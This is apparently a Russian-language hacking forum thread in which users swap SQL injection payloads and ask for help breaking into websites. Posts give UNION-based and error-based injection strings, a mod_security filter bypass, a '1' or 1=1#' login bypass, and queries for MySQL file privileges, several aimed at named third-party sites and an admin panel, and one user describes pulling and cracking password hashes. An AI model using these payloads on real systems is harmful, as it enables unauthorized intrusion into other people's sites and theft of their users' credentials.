вот этот скрин: http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg фильтрация недостаточная раз пропускает все символы, вследствии чего можно сделать вывод что cross-site-scripting возможен.
значит таблицы в другой базе. 1. Узнаем базу под которой работает необходимая таблица id=1+union+select+1,2,3,4,5,6,7,8,table_schema+from+information_schema.tables+where+table_name='имя_таблицы'-- 2. Делаем запрос id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+имя_базы.ftpuser--
Помогите раскрутить Не могу вывести колумны. По коунт кол-во 453, могу посмотреть.Вывести не могу. Стял mod_security, обошел, а вот что еще фильтруется не пойму.
http://littlehouseofhats.us/collection_details.php?ID=-130'+/*!UNION*/+SELECT+COLUMN_NAME,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+10,1%23
https://www.fortline.ru/manager/ + http://www.fortline.ru/cms/index.php ------------------ LOGIN: 1' or 1=1# 1 PASS: hgfjhgjtgfjthitufikjk +в админке sql inj. http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+ P.S http://www.fortline.ru/cms/access.php
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так? И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает: Введите Ваш логин и пароль 1\' or 1=1# 1 Тесть к кавычке подставляет слеш, как обойти?
О боже. В наше время, уже доволько редко встречается. В твоем случае, скорее всего там есть фильтрация... скорее всего, даже можеш не пытатся or-ом)).
Проверяем права на запись и чтение файлов id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='root'-- Y-есть права N-нет прав
а поиск на форуме поискать влом? сколько можно на одни и те же вопросы отвечать....просто 3.14здец полнейший...опять каникулы что ли?
Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется id=1+union+select+1,2,3,4,user()-- а затем уже проверять конкретного id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='наш юзер под которым сидим'--
Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку. Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем. Что тут такое ?
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится